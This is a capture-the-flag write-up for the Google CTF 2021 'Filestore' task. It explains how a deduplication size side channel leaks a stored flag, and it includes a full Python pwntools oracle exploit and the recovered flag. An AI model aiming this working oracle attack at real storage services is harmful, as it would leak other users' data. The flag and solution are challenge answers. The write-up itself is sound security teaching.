Skip to content

Instantly share code, notes, and snippets.

@KovalDS
Last active August 2, 2021 14:08
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save KovalDS/1c5e25a87bd8faf2b6e69556ab1f4ad7 to your computer and use it in GitHub Desktop.
Save KovalDS/1c5e25a87bd8faf2b6e69556ab1f4ad7 to your computer and use it in GitHub Desktop.
Google CTF 2021 | Filestore writeup

Task

We stored our flag on this platform, but forgot to save the id. Can you help us restore it?

filestore.2021.ctfcompetition.com 1337

Also there is an attachment with the source code

Task analysis

When we connect to server we've got three different options:

  1. load - read file content by id
  2. store - store line of data in file. Returns file id (16 random characters).
  3. status - print memory usage, number of files and some other useless info

Here's important takeaways we've got after analysing code:

  • There are no files actually , all data, including flag are stored inside byte array.1
  • To load *ahem* file, a dictionary files is used that has file id as a key and list of start indexes and lengths as a value. Those indexes point to blocks of file's content in byte array.
  • When we connect to server flag is stored, but it's id is not printed.
  • status prints the size of byte array.
  • Deduplication is used when storing a file to save some space. In few words, it works like this:
    • input string is split to blocks of 16 letters
    • for each block it tries to find prefix that matches some sequence of characters in byte array
    • if there is no common prefix, whole block is appended to byte array, start index and length of block are put into files
    • if there is common prefix, we DON'T save it to byte array and simply store index and length of found occurence of prefix to files

untitled(4)

Finding vulnerabilty

So, flag is in byte array. We could've get it if we knew the file id, but, apparently, we don't. Brute forcing the file id would take 62^16 tries and doesn't seem a good option.

As it usually happens, vulnerability is hidden inside most complex part - deduplication algorithm. We know that algorithm doesn't store sequence of characters to byte array if they are already here. Also, we can check size of byte array using status.

This means, that if we will connect to server and store a flag or it's substring then size of byte array won't change!

So, we don't need to know the file id, we can guess the flag itself using status output as our oracle to guide us in the right direction.

Defining Initial conditions

Let's gather all info that will be useful for writing an exploit.

  • Flag starts with CTF{ and ends with }
  • Initially status says that there is 1 file and 0.026 KB of used space
  • Hence flag length is 27 letters (1024 * 0.026)
  • Hence flag consists of two blocks - 16 and 11 letter long
  • Used space is calculated as (byte array size / 1024) KB
  • If we store a string that is equal to or is a substring of one of flag's block, than used space won't change

Assembling exploit

Before rushing into iterating over all printable characters and constructing a flag letter by letter let's consider a small optimization. First off we can find out which letters the flag consists of. This will narrow down the maximum iterations for each position from 94 (letters + digits + punctuation) to 27 in worst case (by worse case I mean the case when all letters in flag are unique). We can do that by storing files with only one letter and checking if used space changed.

Also, one important note is that I prefer to reconnect to a server every time I save a file for a reason. That is because of how used space is calculated - we divide bytes array size by 1024, and if we'll continue to save file and increase used space over and over then at some point we might face the rounding error that will mess things up a bit. Just check this out print("%0.3fkB" % (63/1024)) and print("%0.3fkB" % (64/1024)) have the same output. Moreover, you might face the false positive when your input will be deduplicated with some string you saved previously. I don't wanna deal with that so let's just slow down a bit and reconnect every time to make our lifes easier.

Finally, let's define a scracth of an algorithm of our oracle attack:

  1. Find from which letters flag consists.
  • Store file with one printable character.
  • Check if used space changed
  • If true - character is part of flag, otherwise it is not
  1. Construct the flag letter by letter.
  • Store file with known part of flag + one character from flag letters
  • If used space increased, then character is not in flag, start over with next character
  • If used space didn't changed, then character is in flag, add it to known part
  • If known flag part has reached the size of block, then return block
  • If we've checked all characters, but size of block wasn't reached then start inserting characters to beginning of known flag part
  • Assemble all blocks into flag

And here is some python code, brought up with love and flavoured with reccursion especially for you

#!/usr/bin/python3

from pwn import *
import string
import math


context.log_level = 'error'

USED_SPACE = 0.026
FLAG_LENGTH = math.ceil(1024 * USED_SPACE)
BLOCK_SIZE = 16

def main():
    flag_letters = get_flag_letters()
    print(f"Flag letters {flag_letters}")
    flag = get_flag(flag_letters)
    print(f"Flag: {flag}")


def get_flag_letters():
    print("Getting flag letters")
    flag_letters = ""
    for letter in string.ascii_letters + string.digits + string.punctuation: # Don't consider whitespaces and non printables
        if is_in_flag(letter):
            flag_letters += letter
    return flag_letters


def get_flag(flag_letters):
    print("Getting flag")
    return get_flag_blocks("CTF{", flag_letters, FLAG_LENGTH)


def get_flag_blocks(prefix, flag_letters, length):
    block_length = length if length < BLOCK_SIZE else BLOCK_SIZE
    block = prefix
    block = get_pattern(block, block_length, flag_letters, lambda block, letter: block + letter)
    block = get_pattern(block, block_length, flag_letters, lambda block, letter: letter + block)
    return block if length <= BLOCK_SIZE else block + get_flag_blocks("", flag_letters, length - block_length)


def get_pattern(block, block_length, flag_letters, pattern_builder):
    print(f"Current block: {block}")
    letter_index = 0
    while len(block) < block_length:
        if letter_index >= len(flag_letters):
            return block
        letter = flag_letters[letter_index]
        if is_in_flag(pattern_builder(block, letter)):
            block = pattern_builder(block, letter)
            print(f"Current block: {block}")
            letter_index = 0
        else:
            letter_index += 1
    return block


def is_in_flag(string):
    socket = remote("filestore.2021.ctfcompetition.com", 1337)
    recv(socket)
    socket.sendline(b"store")
    recv(socket)
    socket.sendline(string.encode())
    recv(socket)
    current_used_space = float(get_used_space(socket))
    socket.close()
    return current_used_space == USED_SPACE 


def get_used_space(socket):
    socket.sendline(b"status")
    response = socket.recvuntilS(b"\nFiles")
    quota_line = response.split("\n")[2]
    return quota_line.split(" ")[1].split("/")[0].replace("kB", "") # Wooo, scared, aren't you?


def recv(socket):
    socket.clean(timeout = 0.1)

    
main()

If we run it we will get a flag:

CTF{CR1M3_0f_d3dup1ic4ti0n}


Note[s]:

1: Needless to say how outraged I am! I mean we already have stuff like sausages without meat. And they bring us the filestoring service without files. What's next, a CTF without flags? A beer without alchohol?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment